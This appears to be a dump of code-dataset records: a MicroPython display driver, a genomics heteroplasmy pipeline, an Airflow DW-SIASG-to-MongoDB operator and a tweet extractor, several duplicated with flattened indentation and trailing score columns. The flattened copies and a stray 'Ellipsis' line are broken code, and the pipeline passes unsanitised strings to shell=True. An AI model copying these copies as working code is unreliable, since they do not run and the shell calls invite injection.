self._write(_PASET, ustruct.pack(">HH", y0, y1))
if data is None:
return self._read(_RAMRD, (x1 - x0 + 1) * (y1 - y0 + 1) * 3)
def _read(self, command, count):
self.dc(0)
self.cs(0)
self.spi.write(bytearray([command]))
data = self.spi.read(count)
self.cs(1)
return data
def pixel(self, x, y, color=None):
if color is None:
r, b, g = self._readblock(x, y, x, y)
return color565(r, g, b)
if not 0 <= x < self.width or not 0 <= y < self.height:
return
self._writeblock(x, y, x, y, ustruct.pack(">H", color))
def fill_rectangle(self, x, y, w, h, color=None):
x = min(self.width - 1, max(0, x))
y = min(self.height - 1, max(0, y))
w = min(self.width - x, max(1, w))
h = min(self.height - y, max(1, h))
if color:
color = ustruct.pack(">H", color)
else:
color = self._colormap[0:2] #background
for i in range(_CHUNK):
self._buf[2*i]=color[0]; self._buf[2*i+1]=color[1]
chunks, rest = divmod(w * h, _CHUNK)
self._writeblock(x, y, x + w - 1, y + h - 1, None)
if chunks:
for count in range(chunks):
self._data(self._buf)
if rest != 0:
mv = memoryview(self._buf)
self._data(mv[:rest*2])
def erase(self):
self.fill_rectangle(0, 0, self.width, self.height)
def blit(self, bitbuff, x, y, w, h):
x = min(self.width - 1, max(0, x))
y = min(self.height - 1, max(0, y))
w = min(self.width - x, max(1, w))
h = min(self.height - y, max(1, h))
chunks, rest = divmod(w * h, _CHUNK)
self._writeblock(x, y, x + w - 1, y + h - 1, None)
written = 0
for iy in range(h):
for ix in range(w):
index = ix+iy*w - written
if index >=_CHUNK:
self._data(self._buf)
written += _CHUNK
index -= _CHUNK
c = bitbuff.pixel(ix,iy)
self._buf[index*2] = self._colormap[c*2]
self._buf[index*2+1] = self._colormap[c*2+1]
rest = w*h - written
if rest != 0:
mv = memoryview(self._buf)
self._data(mv[:rest*2])
def chars(self, str, x, y):
str_w = self._font.get_width(str)
div, rem = divmod(self._font.height(),8)
nbytes = div+1 if rem else div
buf = bytearray(str_w * nbytes)
pos = 0
for ch in str:
glyph, char_w = self._font.get_ch(ch)
for row in range(nbytes):
index = row*str_w + pos
for i in range(char_w):
buf[index+i] = glyph[nbytes*i+row]
pos += char_w
fb = framebuf.FrameBuffer(buf,str_w, self._font.height(), framebuf.MONO_VLSB)
self.blit(fb,x,y,str_w,self._font.height())
return x+str_w
def scroll(self, dy):
self._scroll = (self._scroll + dy) % self.height
self._write(_VSCRSADD, ustruct.pack(">H", self._scroll))
def next_line(self, cury, char_h):
global scrolling
if not self.scrolling:
res = cury + char_h
self.scrolling = (res >= self.height)
if self.scrolling:
self.scroll(char_h)
res = (self.height - char_h + self._scroll)%self.height
self.fill_rectangle(0, res, self.width, self._font.height())
return res
def write(self, text): #does character wrap, compatible with stream output
curx = self._x; cury = self._y
char_h = self._font.height()
width = 0
written = 0
for pos, ch in enumerate(text):
if ch == '\n':
if pos>0:
self.chars(text[written:pos],curx,cury)
curx = 0; written = pos+1; width = 0
cury = self.next_line(cury,char_h)
else:
char_w = self._font.get_width(ch)
if curx + width + char_w >= self.width:
self.chars(text[written:pos], curx,cury)
curx = 0 ; written = pos; width = char_h
cury = self.next_line(cury,char_h)
else:
width += char_w
if written<len(text):
curx = self.chars(text[written:], curx,cury)
self._x = curx; self._y = cury
def print(self, text): #does word wrap, leaves self._x unchanged
cury = self._y; curx = self._x
char_h = self._font.height()
char_w = self._font.max_width()
lines = text.split('\n')
for line in lines:
words = line.split(' ')
for word in words:
if curx + self._font.get_width(word) >= self.width:
curx = self._x; cury = self.next_line(cury,char_h)
while self._font.get_width(word) > self.width:
self.chars(word[:self.width//char_w],curx,cury)
word = word[self.width//char_w:]
cury = self.next_line(cury,char_h)
if len(word)>0:
curx = self.chars(word+' ', curx,cury)
curx = self._x; cury = self.next_line(cury,char_h)
self._y = cury | pt | 0.141695 | 2.344998 | 2 |
code/workflow/run_hpc_het.py | vtphan/HeteroplasmyWorkflow | 1 | 13570 | import subprocess
import os
import sys
import datetime
import random
from configparser import ConfigParser
from datetime import datetime
import s03_heteroplasmy_likelihood, s04_sort_candidates, s05_select_sites, s06_location_conservation
import multiprocessing
def check_exist(cmd, thing):
    """Probe for `thing` by running `cmd thing` in a shell; exit if it fails."""
    probe = ' '.join((cmd, thing))
    try:
        subprocess.check_output(probe, shell=True)
    except subprocess.CalledProcessError:
        print("Error: did not find %s in path." % thing)
        sys.exit(0)
def log_error(cmd, exec_output, exec_error, LOG_FILE):
    """Append a timestamped error record (command, output, error) to LOG_FILE."""
    entry = 'time: %s\ncmd: %s\noutput: %s\nexec error:%s\n' % (
        str(datetime.now()), cmd, exec_output, exec_error)
    with open(LOG_FILE, 'a') as f:
        f.write(entry)
def log_final(no_error, argv):
    """Append a one-line completion record next to this script.

    BUG FIX: the original referenced a module-level SCRIPT_DIR that is never
    defined at module scope (it only exists as a local inside process()),
    so every call raised NameError. The script directory is now derived
    from __file__.
    """
    script_dir = os.path.dirname(os.path.abspath(__file__))
    log_output = os.path.join(script_dir, 'log_align_analyze_sort.txt')
    with open(log_output, 'a') as f:
        f.write('%s %s %s %s\n' % (no_error, argv[0], argv[1], str(datetime.now())))
def process(params):
    """Run the heteroplasmy pipeline: score, sort, select sites, conservation, plot.

    params is a dict expected to carry the keys: ref, annotation, dist,
    read_file, out_html_name, random_id, read_dir, output_dir, log_file,
    alignment_quality, score_threshold, percentage_threshold.

    NOTE(review): the __main__ block of this file builds the dict with the
    keys 'READS_DIR'/'OUTPUT_DIR'/'LOG_FILE' (upper case), which would raise
    KeyError here -- confirm which spelling callers actually use.
    """
    ref = params['ref']
    annotation = params['annotation']
    dist = params['dist']
    read_file = params['read_file']
    out_html_name = params['out_html_name']
    random_id = params['random_id']
    READS_DIR = params['read_dir']
    OUTPUT_DIR = params['output_dir']
    LOG_FILE = params['log_file']
    alignment_quality = params['alignment_quality']
    score_threshold = params['score_threshold']
    percentage_threshold = params['percentage_threshold']
    # print(ref)
    # print(annotation)
    # print(dist)
    # print(read_file)
    # print(READS_DIR)
    # print(OUTPUT_DIR)
    # print(LOG_FILE)
    # print(alignment_quality)
    # print(score_threshold)
    # print(percentage_threshold)
    # read version
    # Reads a float version number from a VERSION file in the current
    # working directory (value is parsed but not used further below).
    with open('VERSION','r') as f:
        line = f.readline()
        version = float(line.strip())
    # #--------------------------------------------------------------
    SCRIPT_DIR = os.getcwd()
    print("\nComputing scores")
    # print("Version: "+str(version))
    output = 'None'
    if not os.path.exists(OUTPUT_DIR):
        os.makedirs(OUTPUT_DIR)
    ###########################################################
    # 03_compute_heteroplasmy likelihood
    # 04_sort_sites
    ###########################################################
    check_exist('ls', annotation)
    csv_dir = os.path.join(OUTPUT_DIR, "csv")
    if not os.path.exists(csv_dir):
        os.makedirs(csv_dir)
    print("Compute heteroplasmy likelihood")
    # Fan the per-sample likelihood computation out over a process pool;
    # one job per line (sample name) in read_file.
    P = multiprocessing.Pool()
    jobs = []
    with open(read_file, 'r') as f:
        for line in f:
            read1 = os.path.join(READS_DIR, line.strip() + '_1.fastq')
            read2 = os.path.join(READS_DIR, line.strip() + '_2.fastq')
            name = read1.split('/')[-1].split('_R1')[0]
            # name = line.strip()
            out_csv = os.path.join(csv_dir, name+'_f2_F0x900_q'+alignment_quality+'.csv')
            out_filtered_sam = os.path.join(OUTPUT_DIR, name+'_f2_F0x900_q'+alignment_quality+'.sam')
            no_error = True
            output = 'None'
            kw = {
                'ref': ref,
                'out_filtered_sam': out_filtered_sam,
                'annotation': annotation,
                'out_csv': out_csv,
            }
            jobs.append(P.apply_async(s03_heteroplasmy_likelihood.process, (), kw))
    P.close()
    P.join()
    # Sort score
    # Second pool pass: sort the per-sample candidate CSVs produced above.
    P = multiprocessing.Pool()
    jobs = []
    with open(read_file, 'r') as f:
        for line in f:
            read1 = os.path.join(READS_DIR, line.strip() + '_1.fastq')
            read2 = os.path.join(READS_DIR, line.strip() + '_2.fastq')
            name = read1.split('/')[-1].split('_R1')[0]
            # name = line.strip()
            out_csv = os.path.join(csv_dir, name+'_f2_F0x900_q'+alignment_quality+'.csv')
            kw2 = {
                'out_csv': out_csv
            }
            jobs.append(P.apply_async(s04_sort_candidates.process, (), kw2))
    P.close()
    P.join()
    print ('Finished computing heteroplasmy scores.\n')
    ###########################################################
    # 05_select_sites
    ###########################################################
    print('Select heteroplasmy sites.')
    # run select_sites.py
    result_dir = os.path.join(OUTPUT_DIR,"Result")
    if not os.path.exists(result_dir):
        os.makedirs(result_dir)
    # Infer the organelle type from the requested output file name.
    organellar_type = None
    if 'chloroplast' in out_html_name:
        organellar_type = 'chloroplast'
    if 'mitochondria' in out_html_name:
        organellar_type = 'mitochondria'
    select_sites_inputs = {
        'csv_dir' : csv_dir,
        'score_threshold': score_threshold,
        'percentage_threshold': percentage_threshold,
        'name_list' : None,
        'organellar_type': organellar_type,
        'result_dir': result_dir
    }
    het_file = s05_select_sites.process(select_sites_inputs)
    ###########################################################
    # 06_compute_site_conservation
    ###########################################################
    # run location_conservation.py
    print('\nCompute site conservation.')
    # NOTE(review): if out_html_name names neither organelle, cp_conserved
    # stays None and the plotting command below receives the string 'None'.
    cp_conserved = None
    if organellar_type == 'chloroplast':
        cp_conserved = os.path.join(result_dir, "chloroplast_conserved_"+dist+".csv")
    if organellar_type == 'mitochondria':
        cp_conserved = os.path.join(result_dir, "mitochondria_conserved_"+dist+".csv")
    location_conservation_inputs = {
        'het_file': het_file,
        'func': dist,
        'output': cp_conserved
    }
    s06_location_conservation.main(location_conservation_inputs)
    ###########################################################
    # 07_plot
    ###########################################################
    # run plot_heteroplasmy.py
    print('\nPlot heteroplasmies.')
    plot_heteroplasmy = os.path.join(SCRIPT_DIR, 's07_plot_heteroplasmy.py')
    check_exist('ls',plot_heteroplasmy)
    # genome_name = '"Daucus carota chloroplast genome"'
    if organellar_type == 'chloroplast':
        genome_name = '"Daucus carota chloroplast genome"'
    if organellar_type == 'mitochondria':
        genome_name = '"Daucus carota mitochondrial genome"'
    out_html = os.path.join(OUTPUT_DIR, out_html_name)
    # Plotting runs as a subprocess; failures are logged, not raised.
    cmd = 'python %s %s %s %s %s %s' %(plot_heteroplasmy, genome_name, annotation, het_file, cp_conserved, out_html)
    print(cmd)
    print()
    try:
        output = subprocess.check_call(cmd, shell=True)
    except:
        no_error = False
        log_error(cmd, output, sys.exc_info(), LOG_FILE)
    print("\nSuccess!\n")
    print("Vizualization file : ", out_html)
if __name__ == '__main__':
    if len(sys.argv) != 13:
        print('Usage: python', sys.argv[0], 'ref', 'annotation', 'dist', 'read_file', 'output.html', 'random_id', 'READS_DIR', 'output_dir', 'log_file', 'alignment_quality', 'score_threshold', 'percentage_threshold')
        sys.exit(0)
    # BUG FIX: process() reads params['read_dir'], params['output_dir'] and
    # params['log_file'], but this dict previously used the keys 'READS_DIR',
    # 'OUTPUT_DIR' and 'LOG_FILE', causing a KeyError on every run.
    params = {
        'ref': sys.argv[1],
        'annotation': sys.argv[2],
        'dist': sys.argv[3],
        'read_file': sys.argv[4],
        'out_html_name': sys.argv[5],
        'random_id': sys.argv[6],
        'read_dir': sys.argv[7],
        'output_dir': sys.argv[8],
        'log_file': sys.argv[9],
        'alignment_quality': sys.argv[10],
        'score_threshold': sys.argv[11],
        'percentage_threshold': sys.argv[12],
    }
    process(params)
| import subprocess
import os
import sys
import datetime
import random
from configparser import ConfigParser
from datetime import datetime
import s03_heteroplasmy_likelihood, s04_sort_candidates, s05_select_sites, s06_location_conservation
import multiprocessing
def check_exist(cmd, thing):
try:
subprocess.check_output('%s %s' % (cmd, thing), shell=True)
except subprocess.CalledProcessError:
print("Error: did not find %s in path." % thing)
sys.exit(0)
def log_error(cmd, exec_output, exec_error, LOG_FILE):
with open(LOG_FILE, 'a') as f:
f.write('time: %s\ncmd: %s\noutput: %s\nexec error:%s\n' % (str(datetime.now()), cmd, exec_output, exec_error))
def log_final(no_error, argv):
log_output = os.path.join(SCRIPT_DIR, 'log_align_analyze_sort.txt')
with open(log_output, 'a') as f:
f.write('%s %s %s %s\n' % (no_error, argv[0], argv[1], str(datetime.now())))
def process(params):
ref = params['ref']
annotation = params['annotation']
dist = params['dist']
read_file = params['read_file']
out_html_name = params['out_html_name']
random_id = params['random_id']
READS_DIR = params['read_dir']
OUTPUT_DIR = params['output_dir']
LOG_FILE = params['log_file']
alignment_quality = params['alignment_quality']
score_threshold = params['score_threshold']
percentage_threshold = params['percentage_threshold']
# print(ref)
# print(annotation)
# print(dist)
# print(read_file)
# print(READS_DIR)
# print(OUTPUT_DIR)
# print(LOG_FILE)
# print(alignment_quality)
# print(score_threshold)
# print(percentage_threshold)
# read version
with open('VERSION','r') as f:
line = f.readline()
version = float(line.strip())
# #--------------------------------------------------------------
SCRIPT_DIR = os.getcwd()
print("\nComputing scores")
# print("Version: "+str(version))
output = 'None'
if not os.path.exists(OUTPUT_DIR):
os.makedirs(OUTPUT_DIR)
###########################################################
# 03_compute_heteroplasmy likelihood
# 04_sort_sites
###########################################################
check_exist('ls', annotation)
csv_dir = os.path.join(OUTPUT_DIR, "csv")
if not os.path.exists(csv_dir):
os.makedirs(csv_dir)
print("Compute heteroplasmy likelihood")
P = multiprocessing.Pool()
jobs = []
with open(read_file, 'r') as f:
for line in f:
read1 = os.path.join(READS_DIR, line.strip() + '_1.fastq')
read2 = os.path.join(READS_DIR, line.strip() + '_2.fastq')
name = read1.split('/')[-1].split('_R1')[0]
# name = line.strip()
out_csv = os.path.join(csv_dir, name+'_f2_F0x900_q'+alignment_quality+'.csv')
out_filtered_sam = os.path.join(OUTPUT_DIR, name+'_f2_F0x900_q'+alignment_quality+'.sam')
no_error = True
output = 'None'
kw = {
'ref': ref,
'out_filtered_sam': out_filtered_sam,
'annotation': annotation,
'out_csv': out_csv,
}
jobs.append(P.apply_async(s03_heteroplasmy_likelihood.process, (), kw))
P.close()
P.join()
# Sort score
P = multiprocessing.Pool()
jobs = []
with open(read_file, 'r') as f:
for line in f:
read1 = os.path.join(READS_DIR, line.strip() + '_1.fastq')
read2 = os.path.join(READS_DIR, line.strip() + '_2.fastq')
name = read1.split('/')[-1].split('_R1')[0]
# name = line.strip()
out_csv = os.path.join(csv_dir, name+'_f2_F0x900_q'+alignment_quality+'.csv')
kw2 = {
'out_csv': out_csv
}
jobs.append(P.apply_async(s04_sort_candidates.process, (), kw2))
P.close()
P.join()
print ('Finished computing heteroplasmy scores.\n')
###########################################################
# 05_select_sites
###########################################################
print('Select heteroplasmy sites.')
# run select_sites.py
result_dir = os.path.join(OUTPUT_DIR,"Result")
if not os.path.exists(result_dir):
os.makedirs(result_dir)
organellar_type = None
if 'chloroplast' in out_html_name:
organellar_type = 'chloroplast'
if 'mitochondria' in out_html_name:
organellar_type = 'mitochondria'
select_sites_inputs = {
'csv_dir' : csv_dir,
'score_threshold': score_threshold,
'percentage_threshold': percentage_threshold,
'name_list' : None,
'organellar_type': organellar_type,
'result_dir': result_dir
}
het_file = s05_select_sites.process(select_sites_inputs)
###########################################################
# 06_compute_site_conservation
###########################################################
# run location_conservation.py
print('\nCompute site conservation.')
cp_conserved = None
if organellar_type == 'chloroplast':
cp_conserved = os.path.join(result_dir, "chloroplast_conserved_"+dist+".csv")
if organellar_type == 'mitochondria':
cp_conserved = os.path.join(result_dir, "mitochondria_conserved_"+dist+".csv")
location_conservation_inputs = {
'het_file': het_file,
'func': dist,
'output': cp_conserved
}
s06_location_conservation.main(location_conservation_inputs)
###########################################################
# 07_plot
###########################################################
# run plot_heteroplasmy.py
print('\nPlot heteroplasmies.')
plot_heteroplasmy = os.path.join(SCRIPT_DIR, 's07_plot_heteroplasmy.py')
check_exist('ls',plot_heteroplasmy)
# genome_name = '"Daucus carota chloroplast genome"'
if organellar_type == 'chloroplast':
genome_name = '"Daucus carota chloroplast genome"'
if organellar_type == 'mitochondria':
genome_name = '"Daucus carota mitochondrial genome"'
out_html = os.path.join(OUTPUT_DIR, out_html_name)
cmd = 'python %s %s %s %s %s %s' %(plot_heteroplasmy, genome_name, annotation, het_file, cp_conserved, out_html)
print(cmd)
print()
try:
output = subprocess.check_call(cmd, shell=True)
except:
no_error = False
log_error(cmd, output, sys.exc_info(), LOG_FILE)
print("\nSuccess!\n")
print("Vizualization file : ", out_html)
if __name__ == '__main__':
if len(sys.argv) != 13:
print('Usage: python', sys.argv[0], 'ref', 'annotation', 'dist', 'read_file', 'output.html', 'random_id', 'READS_DIR', 'output_dir', 'log_file', 'alignment_quality', 'score_threshold', 'percentage_threshold')
sys.exit(0)
params = {
'ref': sys.argv[1],
'annotation': sys.argv[2],
'dist': sys.argv[3],
'read_file': sys.argv[4],
'out_html_name': sys.argv[5],
'random_id': sys.argv[6],
'READS_DIR': sys.argv[7],
'OUTPUT_DIR': sys.argv[8],
'LOG_FILE': sys.argv[9],
'alignment_quality': sys.argv[10],
'score_threshold': sys.argv[11],
'percentage_threshold': sys.argv[12],
}
process(params)
| it | 0.291593 | 2.239021 | 2 |
airflow/providers/siasg/dw/transfers/relatorio_para_mongo.py | CarlosAdp/airflow-providers-siasg | 1 | 13571 | from datetime import datetime
from typing import Any, List
import json
import tempfile
from airflow.models.baseoperator import BaseOperator
from airflow.providers.mongo.hooks.mongo import MongoHook
import pandas
from airflow.providers.siasg.dw.hooks.dw import DWSIASGHook
class DWSIASGRelatorioParaMongoOperator(BaseOperator):
    '''Downloads a report from DW-SIASG into a Mongo database.

    :param id_conexao: id of a "dw_siasg"-type connection
    :type id_conexao: str
    :param id_relatorio: id of the report in DW-SIASG
    :type id_relatorio: str
    :param id_conexao_mongo: id of a "mongo"-type connection
    :type id_conexao_mongo: str
    :param banco: database name
    :type banco: str
    :param colecao: collection name
    :type colecao: str
    :param respostas_prompts: list of answers for the report's prompts
    :type respostas_prompts: List[str]
    :param timeout_segundos: maximum wait time in seconds
    :type timeout_segundos: int, optional
    :param truncar_colecao: `True` if the collection must be truncated before
        insertion, `False` otherwise
    :type truncar_colecao: bool
    '''
    # Attributes rendered by Airflow's Jinja templating before execute().
    template_fields = [
        'id_relatorio', 'respostas_prompts', 'banco', 'colecao'
    ]
    id_conexao: str
    id_relatorio: str
    respostas_prompts: List[str]
    timeout_segundos: int
    id_conexao_mongo: str
    banco: str
    colecao: str
    truncar_colecao: bool
    def __init__(
        self,
        id_conexao: str,
        id_relatorio: str,
        id_conexao_mongo: str,
        banco: str = None,
        colecao: str = 'test',
        respostas_prompts: List[str] = None,
        timeout_segundos: int = 60,
        truncar_colecao: bool = False,
        **kwargs
    ) -> None:
        super().__init__(**kwargs)
        self.id_conexao = id_conexao
        self.id_relatorio = id_relatorio
        self.respostas_prompts = respostas_prompts
        self.timeout_segundos = timeout_segundos
        self.id_conexao_mongo = id_conexao_mongo
        self.banco = banco
        self.colecao = colecao
        self.truncar_colecao = truncar_colecao
    def execute(self, context: Any) -> None:
        """Download the report as Excel, load it and insert it into Mongo.

        Pushes the number of inserted documents to XCom under the key
        'registros_inseridos'.
        """
        self.log.info(
            'Baixando relatório "%s" para coleção do mongo "%s" com as '
            'seguintes respostas para prompts: "%s"%s',
            self.id_relatorio, self.colecao, self.respostas_prompts,
            '. Truncando coleção' if self.truncar_colecao else ''
        )
        # After templating, respostas_prompts may arrive as a JSON string.
        respostas_prompts = json.loads(self.respostas_prompts) \
            if isinstance(self.respostas_prompts, str) \
            else self.respostas_prompts
        # The temp file only reserves a path for the Excel download.
        # NOTE(review): pandas reopens the file while it is still held open
        # here -- fine on POSIX, may fail on Windows; confirm target platform.
        with tempfile.NamedTemporaryFile(mode='wb') as arquivo:
            instante = datetime.now()
            with DWSIASGHook(self.id_conexao) as hook:
                local, _ = hook.baixa_para_excel(
                    self.id_relatorio, arquivo.name, respostas_prompts,
                    self.timeout_segundos
                )
            df = pandas.read_excel(local)
            # Strip dots from column names, presumably because MongoDB field
            # names may not contain '.' -- TODO confirm.
            df.columns = df.columns.str.replace('.', '', regex=False)
            df['Timestamp'] = instante
        with MongoHook(self.id_conexao_mongo) as hook:
            if self.truncar_colecao:
                # Empty filter {} deletes every document in the collection.
                hook.delete_many(self.colecao, {}, self.banco)
            if len(df) > 0:
                inseridos = hook.insert_many(
                    self.colecao, df.to_dict('records'), self.banco
                ).inserted_ids
            else:
                inseridos = []
        self.log.info(
            'Relatório transferido com sucesso, tendo produzido %s registros',
            len(inseridos)
        )
        self.xcom_push(context, 'registros_inseridos', len(inseridos))
| from datetime import datetime
from typing import Any, List
import json
import tempfile
from airflow.models.baseoperator import BaseOperator
from airflow.providers.mongo.hooks.mongo import MongoHook
import pandas
from airflow.providers.siasg.dw.hooks.dw import DWSIASGHook
class DWSIASGRelatorioParaMongoOperator(BaseOperator):
'''Baixa um relatório do DW-SIASG para um banco Mongo
:param id_conexao: id pra conexão do tipo "dw_siasg"
:type id_conexao: str
:param id_relatorio: id do relatório no DW-SIASG
:type id_relatorio: str
:param id_conexao_mongo: id para conexão do tipo "mongo"
:type id_conexao_mongo
:param banco: Nome do banco
:type banco: str
:param colecao: Nome da coleção
:type colecao: str
:param repostas_prompts: lista de respostas para prompts do relatório
:type repostas_prompts: List[str]
:param timeout_segundos_segundos: tempo máximo de espera em segundos
:type timeout_segundos_segundos: int, opcional
:param truncar_colecao: `True` se coleção deve ser truncada antes da
inserção e `False` caso contrário
:type truncar_colecao: bool
'''
template_fields = [
'id_relatorio', 'respostas_prompts', 'banco', 'colecao'
]
id_conexao: str
id_relatorio: str
respostas_prompts: List[str]
timeout_segundos: int
id_conexao_mongo: str
banco: str
colecao: str
truncar_colecao: bool
def __init__(
self,
id_conexao: str,
id_relatorio: str,
id_conexao_mongo: str,
banco: str = None,
colecao: str = 'test',
respostas_prompts: List[str] = None,
timeout_segundos: int = 60,
truncar_colecao: bool = False,
**kwargs
) -> None:
super().__init__(**kwargs)
self.id_conexao = id_conexao
self.id_relatorio = id_relatorio
self.respostas_prompts = respostas_prompts
self.timeout_segundos = timeout_segundos
self.id_conexao_mongo = id_conexao_mongo
self.banco = banco
self.colecao = colecao
self.truncar_colecao = truncar_colecao
def execute(self, context: Any) -> None:
self.log.info(
'Baixando relatório "%s" para coleção do mongo "%s" com as '
'seguintes respostas para prompts: "%s"%s',
self.id_relatorio, self.colecao, self.respostas_prompts,
'. Truncando coleção' if self.truncar_colecao else ''
)
respostas_prompts = json.loads(self.respostas_prompts) \
if isinstance(self.respostas_prompts, str) \
else self.respostas_prompts
with tempfile.NamedTemporaryFile(mode='wb') as arquivo:
instante = datetime.now()
with DWSIASGHook(self.id_conexao) as hook:
local, _ = hook.baixa_para_excel(
self.id_relatorio, arquivo.name, respostas_prompts,
self.timeout_segundos
)
df = pandas.read_excel(local)
df.columns = df.columns.str.replace('.', '', regex=False)
df['Timestamp'] = instante
with MongoHook(self.id_conexao_mongo) as hook:
if self.truncar_colecao:
hook.delete_many(self.colecao, {}, self.banco)
if len(df) > 0:
inseridos = hook.insert_many(
self.colecao, df.to_dict('records'), self.banco
).inserted_ids
else:
inseridos = []
self.log.info(
'Relatório transferido com sucesso, tendo produzido %s registros',
len(inseridos)
)
self.xcom_push(context, 'registros_inseridos', len(inseridos))
| pt | 0.22384 | 2.270876 | 2 |
utils/extractor.py | nwoodward/twarc | 20 | 13572 | <reponame>nwoodward/twarc
#!/usr/bin/env python3
from datetime import datetime
import json
import os
import re
import argparse
import csv
import copy
import sys
import gzip
strptime = datetime.strptime
class attriObject:
"""Class object for attribute parser."""
def __init__(self, string):
self.value = re.split(":", string)
self.title = self.value[-1]
def getElement(self, json_object):
found = [json_object]
for entry in self.value:
for index in range(len(found)):
try:
found[index] = found[index][entry]
except (TypeError, KeyError):
print("'{0}' is not a valid json entry.".format(":".join(self.value)))
sys.exit()
#If single search object is a list, search entire list. Error if nested lists.
if isinstance(found[index], list):
if len(found) > 1:
raise Exception("Extractor currently does not handle nested lists.")
found = found[index]
return found
def tweets_files(string, path):
"""Iterates over json files in path."""
for filename in os.listdir(path):
if re.match(string, filename) and ".jsonl" in filename:
f = gzip.open if ".gz" in filename else open
yield path + filename, f
Ellipsis
def parse(args):
with open(args.output, 'w+', encoding="utf-8") as output:
csv_writer = csv.writer(output, dialect=args.dialect)
csv_writer.writerow([a.title for a in args.attributes])
count = 0
tweets = set()
for filename, f in tweets_files(args.string, args.path):
print("parsing", filename)
with f(filename, 'rb') as data_file:
for line in data_file:
try:
json_object = json.loads(line.decode("utf-8"))
except ValueError:
print("Error in", filename, "entry incomplete.")
continue
#Check for duplicates
identity = json_object['id']
if identity in tweets:
continue
tweets.add(identity)
#Check for time restrictions.
if args.start or args.end:
tweet_time = strptime(json_object['created_at'],'%a %b %d %H:%M:%S +0000 %Y')
if args.start and args.start > tweet_time:
continue
if args.end and args.end < tweet_time:
continue
#Check for hashtag.
if args.hashtag:
for entity in json_object['entities']["hashtags"]:
if entity['text'].lower() == args.hashtag:
break
else:
continue
count += extract(json_object, args, csv_writer)
print("Searched", len(tweets), "tweets and recorded", count, "items.")
print("largest id:", max(tweets))
def extract(json_object, args, csv_writer):
"""Extract and write found attributes."""
found = [[]]
for attribute in args.attributes:
item = attribute.getElement(json_object)
if len(item) == 0:
for row in found:
row.append("NA")
else:
found1 = []
for value in item:
if value is None:
value = "NA"
new = copy.deepcopy(found)
for row in new:
row.append(value)
found1.extend(new)
found = found1
for row in found:
csv_writer.writerow(row)
return len(found)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Extracts attributes from tweets.')
parser.add_argument("attributes", nargs='*', help="Attributes to search for. Attributes inside nested inside other attributes should be seperated by a colon. Example: user:screen_name, entities:hashtags:text.")
parser.add_argument("-dialect", default="excel", help="Sets dialect for csv output. Defaults to excel. See python module csv.list_dialects()")
parser.add_argument("-string", default="", help="Regular expression for files to parse. Defaults to empty string.")
parser.add_argument("-path", default="./", help="Optional path to folder containing tweets. Defaults to current folder.")
parser.add_argument("-output", default="output.csv", help="Optional file to output results. Defaults to output.csv.")
parser.add_argument("-start", default="", help="Define start date for tweets. Format (mm:dd:yyyy)")
parser.add_argument("-end", default="", help="Define end date for tweets. Format (mm:dd:yyyy)")
parser.add_argument("-hashtag", default="", help="Define a hashtag that must be in parsed tweets.")
args = parser.parse_args()
if not args.path.endswith("/"):
args.path += "/"
args.start = strptime(args.start, '%m:%d:%Y') if args.start else False
args.end = strptime(args.end, '%m:%d:%Y') if args.end else False
args.attributes = [attriObject(i) for i in args.attributes]
args.string = re.compile(args.string)
args.hashtag = args.hashtag.lower()
parse(args)
| #!/usr/bin/env python3
from datetime import datetime
import json
import os
import re
import argparse
import csv
import copy
import sys
import gzip
strptime = datetime.strptime
class attriObject:
"""Class object for attribute parser."""
def __init__(self, string):
self.value = re.split(":", string)
self.title = self.value[-1]
def getElement(self, json_object):
found = [json_object]
for entry in self.value:
for index in range(len(found)):
try:
found[index] = found[index][entry]
except (TypeError, KeyError):
print("'{0}' is not a valid json entry.".format(":".join(self.value)))
sys.exit()
#If single search object is a list, search entire list. Error if nested lists.
if isinstance(found[index], list):
if len(found) > 1:
raise Exception("Extractor currently does not handle nested lists.")
found = found[index]
return found
def tweets_files(string, path):
"""Iterates over json files in path."""
for filename in os.listdir(path):
if re.match(string, filename) and ".jsonl" in filename:
f = gzip.open if ".gz" in filename else open
yield path + filename, f
Ellipsis
def parse(args):
with open(args.output, 'w+', encoding="utf-8") as output:
csv_writer = csv.writer(output, dialect=args.dialect)
csv_writer.writerow([a.title for a in args.attributes])
count = 0
tweets = set()
for filename, f in tweets_files(args.string, args.path):
print("parsing", filename)
with f(filename, 'rb') as data_file:
for line in data_file:
try:
json_object = json.loads(line.decode("utf-8"))
except ValueError:
print("Error in", filename, "entry incomplete.")
continue
#Check for duplicates
identity = json_object['id']
if identity in tweets:
continue
tweets.add(identity)
#Check for time restrictions.
if args.start or args.end:
tweet_time = strptime(json_object['created_at'],'%a %b %d %H:%M:%S +0000 %Y')
if args.start and args.start > tweet_time:
continue
if args.end and args.end < tweet_time:
continue
#Check for hashtag.
if args.hashtag:
for entity in json_object['entities']["hashtags"]:
if entity['text'].lower() == args.hashtag:
break
else:
continue
count += extract(json_object, args, csv_writer)
print("Searched", len(tweets), "tweets and recorded", count, "items.")
print("largest id:", max(tweets))
def extract(json_object, args, csv_writer):
"""Extract and write found attributes."""
found = [[]]
for attribute in args.attributes:
item = attribute.getElement(json_object)
if len(item) == 0:
for row in found:
row.append("NA")
else:
found1 = []
for value in item:
if value is None:
value = "NA"
new = copy.deepcopy(found)
for row in new:
row.append(value)
found1.extend(new)
found = found1
for row in found:
csv_writer.writerow(row)
return len(found)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Extracts attributes from tweets.')
parser.add_argument("attributes", nargs='*', help="Attributes to search for. Attributes inside nested inside other attributes should be seperated by a colon. Example: user:screen_name, entities:hashtags:text.")
parser.add_argument("-dialect", default="excel", help="Sets dialect for csv output. Defaults to excel. See python module csv.list_dialects()")
parser.add_argument("-string", default="", help="Regular expression for files to parse. Defaults to empty string.")
parser.add_argument("-path", default="./", help="Optional path to folder containing tweets. Defaults to current folder.")
parser.add_argument("-output", default="output.csv", help="Optional file to output results. Defaults to output.csv.")
parser.add_argument("-start", default="", help="Define start date for tweets. Format (mm:dd:yyyy)")
parser.add_argument("-end", default="", help="Define end date for tweets. Format (mm:dd:yyyy)")
parser.add_argument("-hashtag", default="", help="Define a hashtag that must be in parsed tweets.")
args = parser.parse_args()
if not args.path.endswith("/"):
args.path += "/"
args.start = strptime(args.start, '%m:%d:%Y') if args.start else False
args.end = strptime(args.end, '%m:%d:%Y') if args.end else False
args.attributes = [attriObject(i) for i in args.attributes]
args.string = re.compile(args.string)
args.hashtag = args.hashtag.lower()
parse(args) | pt | 0.112976 | 2.98681 | 3 |
scripts/bsvDeps.py | mhrtmnn/BSVTools | 7 | 13573 | #!/usr/bin/python3
